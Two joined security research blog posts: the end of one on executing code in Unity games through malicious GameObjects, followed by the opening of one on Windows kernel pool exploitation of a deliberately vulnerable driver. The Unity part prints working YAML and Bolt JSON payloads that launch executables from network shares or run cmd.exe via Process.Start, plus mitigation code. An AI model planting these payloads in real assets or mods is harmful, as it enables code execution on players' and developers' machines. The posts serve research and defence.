I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload.

Below is the event definition I used in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>;
int main() {
  FILE* fp = fopen("/tmp/hello");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*$(string|int|bool|float) [A-Za-z\w_]*$

After pouring over the 426 discovered methods, I fell a short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things. This is just a small sampling:

`Unity.CodeEditor.CodeEditor.SetExternalScriptEditor()`	Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
`PlayerPrefs.DeleteAll()`	Delete all save games and other stored data.
`UnityEditor.FileUtil.UnityDirectoryDelete()`	Invokes Directory.Delete() on the specified directory.
`UnityEngine.ScreenCapture.CaptureScreenshot()`	Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
`UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs()`	Add flags to be passed to the Il2Cpp compiler.
`UnityEditor.BuildPlayerWindow.BuildPlayerAndRun()`	Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
`Application.Quit(), EditorApplication.Exit()`	Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some of the systems are more powerful or less powerful. I will focus on Bolt as an example since it’s pretty popular, Unity acquired it, and it’s now free.

This attack vector was proposed on Peter Clemenko’s blog I mentioned earlier, but it focused on malicious entity injection — I think it should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator).

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs — do this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this creates an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle.

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third-parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (I’m aware of EventTriggers and various UI elements). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a white list of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.” Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended, the surface area is just too large and it’s likely something important will be missed, though a combination of white list and black list may be possible with high confidence.

In general game developers need to decide how much protection they want to add at the app layer vs. putting the risk decision in the hands of a game end-user’s own judgement on what mods to run, just like it’s on them what executables they download. That’s fair, but it might be a good idea to at least give the gamers a heads up that this could be dangerous via documentation and notifications in the UI layer. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

Connor McGarr

7 June 2021 at 00:00

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for myself - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism for myself to not only share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver and the win10-klfh branch (HEVD) to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low integrity processes and AppContainer protected processes, such as a browser sandbox, prevent Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address for ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now not only being very scarce and far-and-few between, information leaks, such as an out-of-bounds read, are the de-facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows, which is already heavily documented much better than any attempt I can make, the implications of the kFLH, from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel mode drivers can allocate dynamic memory from, such as malloc from user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead ofExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One word about the “new” APIs is that they will initialize allocate pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.

The first parameter of this function is POOL_TYPE, which is of type enumeration, that specifies the type of memory to allocate. These values can be seen below.

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from or they can create their own private heaps as well. The Windows pool works a little different, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory. Allocations in the non-paged pool will always be paged in memory. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10 byte _POOL_HEADER structure on 64-bit system, which can be found using WinDbg.

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a _POOL_HEADER structure is freed and it isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union member, as it is clean two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already instrumented in user mode, was implemented into the Windows kernel with the 19H1 build of Windows 10. The “gist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via on the the previously mentioned API calls, there are now a few options, namely four of them, that can service the request. The are:

Low Fragmentation Heap (kLFH)
Variable Size (VS)
Segment Alloc
Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post will be revolving around the kLFH, so for the purposes of this post I highly recommend reading this paper to find out more about the internals of each allocator and to view Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a big deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually preceded prefaces with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about the pool headers with the segment heap is that the kLFH, which will be the target for this post, actually still use _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that any allocation that is a 16 byte granularity (e.g. 1-16 bytes, 17-31 bytes, etc.) up until a 64 byte granularity are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-31 bytes, and so on, up until a 512 byte granularity. Anything larger is either serviced by the VS segment or other various components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristics of 16 consecutive allocations and because the size matches one of the buckets provided by kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool with relatively well. Grooming refers to the fact we can get a lot of pool chunks, which we control, lined up adjacently next to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

kLFH also uses these predetermined buckets to manage chunks. This also removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of the architecture, we know that if we free an object in the kLFH, we can expect that the free will remain until it is used again in an allocation for that specific sized chunk! For example, if we are working in bucket 1, which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of the size 1008 bytes and then we free these objects, the pool manager will not combine these slots because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses it. This also will be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes we need to be very luck to have a driver allocate objects which are of the same size as a vulnerable object which can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some “new” or “novel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is part of a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides it’s obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, which is the function we have been analyzing thus far, is passed an argument called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the “tl;dr” here in a second.

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a “secure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag will allocate a pool chunk based on the size provided here by the client. The issue is that the developer of this driver is not just copying the output to the UserOutputBuffer parameter but that the call to RtlCopyMemory allows the client to decide the amount of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer part, as we fully control this buffer via our call to DeviceIoControl, and can make it a large buffer to avoid it being overflowed. The issue is the second and third parameter.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines.

If the size of the copy operation is greater than the allocation size of0x70 bytes, the number of bytes after 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx

Per the __fastcall calling convention the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer) parameter and RDX (the size specified by us). Dumping the RCX register, we can see the 70 bytes that will hold the allocation.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by ensuring the offset to the PoolTag member of _POOL_HEADER is successful.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different than the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation only values of 0x41 were bubbled back up to user mode. However, recall this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, which shows that the direct next chunk after the Hack chunk is 0xffffe48f4254fb00, which contains a value of 6c54655302081b00 and so on, which is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, that the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called “pool grooming”

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or no way to force the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size. Where does this leave us? Well, what we can do is to first make sure the kLFH is enabled and then also to “fill” all of the “holes”, or freed allocations currently, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the the kLFH bucket is ideal, as it gives us a “clean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for “spraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably we can see several Even tags. This tag is actually a tag used for an object created with a call to CreateEvent, a Windows API, which can actually be invoked from user mode. The prototype can be seen below.

This function returns a handle to the object, which is a technically a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary amount of objects, 5000.

After executing the newly updated code and after setting a breakpoint on the copy location, with the vulnerable pool chunk, take a look at the state of the page which contains the pool chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can see now that there are many free objects and a few event objects. This is reminiscent behavior of us getting a new page for our vulnerable chunk to go, as our vulnerable chunk is prefaces with several event objects, with our vulnerable chunk being allocated directly after. We can also perform additional analysis by inspecting the previous page (recall that for our purposes on this 64-bit Windows 10 install a page is 0x1000 bytes, of 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool from spraying, the goal now is to now allocate the entire new page with event objects and then free every other object in the page we control in the new page. This will allow us to then, right after freeing every other object, to create another object of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations that are being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT

So what kind of object would we like to place in the “holes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. This is the hardest/most tedious part of pool corruption, is finding something that is not only the size needed, but also contains valuable information. This especially bodes true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit “simplified”. It will take a bit of reverse engineering/debugging to calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

Identify calls to ExAllocatePoolWithTag, or similar APIs
Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
Narrow this list further by finding calls that perform the before sentiments, but for the given size pool chunk you need
If you have made it this far, narrow this down further by finding an object with all of the before attributes and with an interesting member, such as a function pointer

